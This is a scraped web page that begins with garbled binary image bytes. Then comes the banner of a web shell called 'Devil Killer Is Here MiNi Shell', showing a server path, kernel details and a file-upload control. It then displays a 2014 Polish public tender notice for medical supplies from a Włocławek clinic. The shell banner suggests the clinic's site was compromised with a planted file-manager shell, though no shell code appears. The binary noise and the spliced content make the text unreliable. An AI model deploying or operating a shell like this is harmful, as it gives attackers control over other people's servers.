JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140402/112024-N-2014.html

<p class="kh_header"><b>Włocławek: ZP/05/2014 Sukcesywna dostawa sprzętu jednorazowego użytku i materiałów medycznych dla MZOZ Sp. z o. o. we Włocławku, z podziałem na 8 pakietów</b><br>
<b>Numer ogłoszenia: 112024 - 2014; data zamieszczenia: 02.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zespół Opieki Zdrowotnej Sp. z o.o. , ul. Kilińskiego 16, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 231 10 33, faks 054 232 56 15.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mzoz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o. o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/05/2014 Sukcesywna dostawa sprzętu jednorazowego użytku i materiałów medycznych dla MZOZ Sp. z o. o. we Włocławku, z podziałem na 8 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET 1 - Pojemniki medyczne oraz pojemniki na odpady i zużyty sprzęt medyczny

Pojemnik na odpady medyczne i zużyty sprzęt, 10L 500 szt.
Pojemnik na odpady medyczne i zużyty sprzęt, 5L  850 szt.
Pojemnik na odpady medyczne i zużyty sprzęt, 2L  1 200 szt.
Pojemnik na odpady medyczne i zużyty sprzęt, 1L  350 szt.
Pojemnik na odpady medyczne i zużyty sprzęt, 0,7L  1 500 szt.
Kubki jednorazowe j.u opakowanie: a 100 sztuk  500 opakowań
Kieliszki do leków plastikowe jednorazowego użytku, niejałowe,                       w opakowaniach a 75 sztuk 300 opakowań
Miska nerkowata z tworzywa mała ok. 20cm  10 szt.
Miska nerkowata z tworzywa duża ok. 30cm  10 szt.
Kuweta plastikowa mała  10 szt.
Kuweta plastikowa średnia 10 szt.
Basen plastikowy z pokrywką, wielorazowy 5 szt.
Kaczka medyczna plastikowa, wielorazowa 5 szt.

PAKIET 2 - Wyroby z włókniny

Prześcieradła jednorazowe, gramatura: 35g/m2, rozmiar: 210x80 cm  1 500 szt.
Prześcieradła jednorazowe, rozmiar: 210x160 cm, gramatura: 35g/m2  600 szt.
Podkłady ochronny na roli, podfoliowany, o wysokiej wytrzymałości mechanicznej, szerokość: 33 cm. Rolka a 40 szt.  200 rolek
Podkłady ochronny na roli, o wysokiej wytrzymałości mechanicznej, szerokość: 50 cm x 50 m. Rolka  500 szt.
Plaster włókninowy z opatrunkiem 6cm x1m  300 szt.
Przylepiec włókninowy na roli 2,5cm x 9,14 m nawinięty na plastikowej rolce bez ograniczników 1 000 szt.
Włókninowa taśma samoprzylepna  15 szt.
Lignina w arkuszach  250 kg
Lignina w rolkach 150 g  200 szt.
Kompresy gaz. niejałowe  17 nitkowe 5x5/100 op 500 opakowań.
Kompresy gaz. niejałowe 17 nitkowe, dopuszczalne rozmiary: 7,5x7,5/100 op., 7x7/100 op 500 opakowań.
Kompresy gaz. jałowe 17 nitkowe 5x5/3 op.  40 000 opakowań
Kompresy gaz. jałowe 17 nitkowe, dopuszczalne rozmiary: 7x7/3 op., 7,5x7,5/3 op.  35 000 opakowań
Bandaże dziane  4x5 500 szt.
Bandaże dziane 4x10 3 000 szt.
Bandaże elastyczne 4x12  60 szt.
Gaza jałowa 1/2M, 17. nitkowa.  600 opakowań
Podkłady higieniczne  1 800 szt.
Papier krepowany miękki op. 500x500 mm -4 opakowania
Opatrunek jałowy do wenflonów  2 000 szt.
Fartuch fizelinowy j.u.  50 szt.
Wata, opakowanie 500 g  20 opakowań

PAKIET 3 - Drobny sprzęt chirurgiczny

Strzykawki  jednorazowe 20 ml. - op. a100 szt. - 15 opakowań
Strzykawki  jednorazowe 10 ml. - op. a 100 szt. - 50 opakowań
Strzykawki  jednorazowe 5 ml.  - op. a 100 szt. - 320 opakowań
Strzykawki  jednorazowe 2 ml - op. a 100 szt. - 350 opakowań      
Strzykawka j.uż. do pomp LUER 50 ml - 100 szt.
Igły  jednorazowe 1,1 40 op. - 100 opakowań
Igły  jednorazowe 0,9 40 op. - 250 opakowań
Igły  jednorazowe 0,8 40 op. - 400 opakowań
Igły  jednorazowe 0,7 40 op. - 300 opakowań
Igły  jednorazowe  0,7 30 op. - 60 opakowań
Igły  jednorazowe  0,6 30 op. - 30 opakowań
Igły  jednorazowe  0,6 25 op. - 10 opakowań
Igły  jednorazowe  0,5 25 op. - 120 opakowań
Igły  jednorazowe  0,45 16 op. - 10 opakowań
Igła Motylek 0,6 - 30 szt.
Igła Motylek 0,7 - 300 szt.
Ostrze chirurgiczne sterylne 10 - 2 opakowania
Ostrze chirurgiczne sterylne 11 - 2 opakowania
Jałowy zestaw do usuwania szwów - 150 opakowań
Pęseta chirurgiczna jednorazowa jałowa - 30 szt.

PAKIET 4 - Rękawice diagnostyczne

Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: XS - 80 opakowań   
Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: S - 1 300 opakowań      
Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: M - 2200 opakowań   
Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: L - 720 opakowań   
Rękawice diagnostyczne nitrylowe, bezpudrowe, opakowanie a 100 szt., rozmiar: XL - 15 opakowań    
Rękawice chirurgiczne lateksowe - rozmiar: 8,0 - 300 par
Rękawice chirurgiczne lateksowe - rozmiar: 7,0 - 300 par

PAKIET 5 - Kaniule i cewniki oraz inny sprzęt medyczny

Wenflon żółty 24G - 200 szt.
Wenflon niebieski 22G - 1000 szt.
Wenflon różowy 20G - 1000 szt.
Wenflon zielony 18G - 200 szt.
Wenflon fioletowy 26G - 100 szt.
Aparat do przetoczeń płynów infuzyjnych - 2 000 szt.
Aparat do przygotowywania i pobierania leków - 10 szt.
Cewnik Foleya CH 14 - 20 szt.
Cewnik Foleya CH 16 - 20 szt.
Cewnik Foleya CH 18 - 100 szt.
Cewnik Foleya CH 20 - 100 szt.
Cewnik Foleya CH 22 - 100 szt.
Worek do zbiórki moczu poj. 2 l - 250 szt.
Wieszaki plastikowy do worków na mocz, pojedynczy - 40 szt.
Cewnik do odsysania górnych dróg oddechowych 18CH - 100 szt.
Cewnik do podawania tlenu przez nos o długości co najmniej 2 m - 100 szt.
Rurka intubacyjna z mankietem niskociśnieniowym FI 7,5 - 10 szt.
Rurka intubacyjna z mankietem niskociśnieniowym FI 6,5 - 10 szt.
Rurka intubacyjna z mankietem niskociśnieniowym FI 8,0 - 10 szt.
Rurka ustno gardłowa Guedel 0 (czarna) - 10 szt.
Rurka ustno gardłowa Guedel 2 (zielona) - 10 szt.
Rurka ustno gardłowa Guedel 3 (żółta) - 10 szt.
Zgłębnik żołądkowy CH16x1000 - 50 szt.
Zgłębnik żołądkowy CH18x1000- 50 szt.

PAKIET 6 - Drobny sprzęt ginekologiczny i akcesoria

Utrwalacz cytologiczny 150-200 ml - 20 opakowań
Żel do USG 0,5L (bez soli) - 400 szt.
Osłonki lateksowe do głowic USG, (opakowanie a 144 sztuki) - 25 opakowań
Pałeczki do pobierania wymazów sterylne 15-22 cm, op. 25 szt.  - 20 opakowań
Szczoteczki cytologiczne trójkątne typu wachlarzyk jałowy - 3500 szt.
Wzierniki typu Cusco rozmiar S, jednorazowego użytku  - 2500 szt.
Wzierniki typu Cusco rozmiar M, jednorazowego użytku - 3300 szt.
Wzierniki typu Cusco rozmiar L, jednorazowego użytku - 200 szt.
Szkiełka cytologiczne z polem do opisu, op. 50 szt. - 60 opakowań      

PAKIET 7 - Drobny sprzęt medyczny i odzież zabiegowa

Szpatułki drewniane jałowe, opakowanie: a 100 sztuk. - 500 opakowań
Opaska identyfikacyjna dla dorosłych - 50 szt.
Worek na zwłoki plastikowy zapinany na zamek błyskawiczny - 3 szt.
Staza automatyczna wielokrotnego użytku - możliwość sterylizacji - 30 szt.
Nożyczki 17,5 proste k. ostre - 10 szt.
Rurki karbowane plastikowe do inhalatorów 72 cm - 20 szt.
Rurki karbowane plastikowe do inhalatorów 104 cm - 20 szt.
Ustniki jednorazowe plastikowe do inhalatora - 200 szt.
Maska do inhalatora dziecięca - 40 szt.
Maska do inhalatora dla dorosłych - 50 szt.
Maseczka jednorazowa 3-warstwowa na gumki - 20 opakowań
Fartuch jednorazowy foliowy - 50 szt.

PAKIET 8 - Elektrody, papiery rejestracyjne i drobne urządzenia diagnostyczne

Papier do USG - PRINTER SONY upp HD 110 - 160 szt.
Papier do EKG ASCARD, rozmiar: 112 x 25 - 500 szt.
Termometr elektroniczny - 20 szt.
Ciśnieniomierz zegarowy mały - 15 szt.
Gruszka do RR - 15 szt.
Mankiet do RR - 15 szt.
Stetoskop lekarski 1-głowicowy - 20 szt.
Pasek gumowy do EKG - 50 szt.
Elektrody metal. do EKG - 4 komplety
Elektrody przyssawkowe - 4 komplety
Elektrody klamrowe - 4 komplety.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składa oświadczenie wg Załącznika Nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W przypadku sprzętu dla którego jest to wymagane, Zamawiający wymaga posiadania certyfikatów dopuszczenia wyrobu na terenie Unii Europejskiej CE - załącznik nr 7 do SIWZ</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania Wykonawcy (o ile nie wynika                    z dokumentów rejestracyjnych) w przypadku podpisywania oferty przez osobę nie wpisaną do dokumentów rejestracyjnych</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mzoz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zespół Opieki Zdrowotnej Sp. z o. o., ul. Jana Kilińskiego 16, 87-800 Włocławek, pokój nr 46 Zamówienia publiczne - 2. piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2014 godzina 13:00, miejsce: Miejski Zespół Opieki Zdrowotnej Sp. z o. o., ul. Jana Kilińskiego 16, 87-800 Włocławek, pokój nr 47 Sekretariat - 2. piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1 - Pojemniki medyczne oraz pojemniki na odpady i zużyty sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojemnik na odpady medyczne i zużyty sprzęt, 10L 500 szt.
Pojemnik na odpady medyczne i zużyty sprzęt, 5L  850 szt.
Pojemnik na odpady medyczne i zużyty sprzęt, 2L  1 200 szt.
Pojemnik na odpady medyczne i zużyty sprzęt, 1L  350 szt.
Pojemnik na odpady medyczne i zużyty sprzęt, 0,7L  1 500 szt.
Kubki jednorazowe j.u opakowanie: a 100 sztuk  500 opakowań
Kieliszki do leków plastikowe jednorazowego użytku, niejałowe,                       w opakowaniach a 75 sztuk 300 opakowań
Miska nerkowata z tworzywa mała ok. 20cm  10 szt.
Miska nerkowata z tworzywa duża ok. 30cm  10 szt.
Kuweta plastikowa mała  10 szt.
Kuweta plastikowa średnia 10 szt.
Basen plastikowy z pokrywką, wielorazowy 5 szt.
Kaczka medyczna plastikowa, wielorazowa 5 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 - Wyroby z włókniny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prześcieradła jednorazowe, gramatura: 35g/m2, rozmiar: 210x80 cm  1 500 szt.
Prześcieradła jednorazowe, rozmiar: 210x160 cm, gramatura: 35g/m2  600 szt.
Podkłady ochronny na roli, podfoliowany, o wysokiej wytrzymałości mechanicznej, szerokość: 33 cm. Rolka a 40 szt.  200 rolek
Podkłady ochronny na roli, o wysokiej wytrzymałości mechanicznej, szerokość: 50 cm x 50 m. Rolka  500 szt.
Plaster włókninowy z opatrunkiem 6cm x 1m  300 szt.
Przylepiec włókninowy na roli 2,5cm x 9,14 m nawinięty na plastikowej rolce bez ograniczników 1 000 szt.
Włókninowa taśma samoprzylepna  15 szt.
Lignina w arkuszach  250 kg
Lignina w rolkach 150 g  200 szt.
Kompresy gaz. niejałowe  17 nitkowe 5x5/100 op 500 opakowań.
Kompresy gaz. niejałowe 17 nitkowe, dopuszczalne rozmiary: 7,5x7,5/100 op., 7x7/100 op 500 opakowań.
Kompresy gaz. jałowe 17 nitkowe 5x5/3 op.  40 000 opakowań
Kompresy gaz. jałowe 17 nitkowe, dopuszczalne rozmiary: 7x7/3 op., 7,5x7,5/3 op.  35 000 opakowań
Bandaże dziane  4x5 500 szt.
Bandaże dziane 4x10 3 000 szt.
Bandaże elastyczne 4x12  60 szt.
Gaza jałowa 1/2M, 17. nitkowa.  600 opakowań
Podkłady higieniczne  1 800 szt.
Papier krepowany miękki op. 500x500 mm -4 opakowania
Opatrunek jałowy do wenflonów  2 000 szt.
Fartuch fizelinowy j.u.  50 szt.
Wata, opakowanie 500 g  20 opakowań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
